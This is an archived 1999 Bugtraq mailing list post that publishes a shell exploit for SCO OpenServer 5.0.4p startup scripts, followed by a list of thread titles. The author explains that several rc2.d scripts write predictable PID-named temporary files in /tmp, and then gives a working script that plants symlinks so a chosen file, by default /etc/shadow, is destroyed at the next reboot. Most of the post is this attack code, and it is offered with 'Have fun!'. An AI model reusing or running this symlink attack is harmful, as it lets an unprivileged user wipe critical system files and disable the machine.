Bugtraq mailing list archives
Little exploit for startup scripts (SCO 5.0.4p).
From: leshka () LESHKA CHUVASHIA SU (leshka)
Date: Sun, 7 Mar 1999 15:07:23 +0300
#!/bin/sh # # ... The punishment for inobedience ... # (Cycle # 2) # # This simple script can help to erase any file # (SCO OpenServer Enterprise System v 5.0.4p). # Have fun ! # # # # # Some of "/etc/rc2.d" startup scripts create and then delete temporary files # with easily predictable names in "/tmp" directory. Below there is a few # interesting fragments of those nice scripts: # # S84rpcinit: # ... # /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$ # /bin/rm -f /tmp/rpc.err$$ # ... # rm -rf /tmp/rpc$$ # # S95nis: # ... # /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$ # /bin/rm -f /tmp/nis.err$$ # ... # rm -f /tmp/nis$$ # # S85tcp: # ... # /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$ # /bin/rm -f /tmp/ps.err$$ # ... # /bin/rm -f /tmp/tps$$ # # S89nfs: # ... # /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$ # /bin/rm -f /tmp/nfs.err$$ # ... # rm -f /tmp/nfs$$ # # Every time during the startup such shell scripts creates files with names # that include a process number of the above shell script. My numerous tests # showed that the number is always the same with every reboot. Pretty good, # isn't it? One problem: how to determine the process number of such script? # It's so simple! Child processes of this script have PID's with values # slightly over than the parent's PID. A little math and one gets it. Next # step is creating a few symbolic links to the victime file in the "/tmp" # directory. During the next startup the victim file will be destroyed. # # P.S. Looking forward to getting published a complete SCO's list of names # of such perfect shell scripts. # # 999,99*2 # # ---------------------- # --------------------------------------------- # ----------------- Dedicated to my beautiful lady ------------------ # --------------------------------------------- # ---------------------- # # Leshka Zakharoff, 1999. E-mail: leshka () leshka chuvashia su (.ru) # # # if [ _$1 = "_" ] then { echo -n "File to delete [/etc/shadow]:" read victim_file if [ _$victim_file = "_" ] then victim_file="/etc/shadow" fi } else victim_file=$1 fi pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf $2 }'` lastpid=`expr $pid - 30` while [ $pid != $lastpid ] do pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid done echo Done ! File \"$victim_file\" will be destroyed after the next reboot.
Current thread:
- Re: Linux /usr/bin/gnuplot overflow, (continued)
- Re: Linux /usr/bin/gnuplot overflow Andrea Arcangeli (Mar 05)
- buffer overflow in /usr/bin/cancel Josh A. Strickland (Mar 05)
- Re: Linux /usr/bin/gnuplot overflow -- SuSE hasnt fixed lsof Mario Lorenz (Mar 05)
- Update to Microsoft Security Bulletin (MS99-006) aleph1 () UNDERGROUND ORG (Mar 05)
- More Internet Explorer zone confusion Jim Paris (Mar 05)
- Re: More Internet Explorer zone confusion Walt Armour (Mar 08)
- Re: More Internet Explorer zone confusion Jeremy Nimmer (Mar 08)
- Re: More Internet Explorer zone confusion Jim Paris (Mar 08)
- ISAPI Extension vulnerability allows to execute code as SYSTEM Aleph One (Mar 08)
- Re: More Internet Explorer zone confusion David E. Smith (Mar 08)
- Little exploit for startup scripts (SCO 5.0.4p). leshka (Mar 07)
- Re: Little exploit for startup scripts (SCO 5.0.4p). Peter van Dijk (Mar 07)
- Re: Little exploit for startup scripts (SCO 5.0.4p). Taneli Leppä (Mar 08)
- Call for Papers: CQRE Detlef Hühnlein (Mar 08)
- Re: Little exploit for startup scripts (SCO 5.0.4p). Jon Coyle (Mar 08)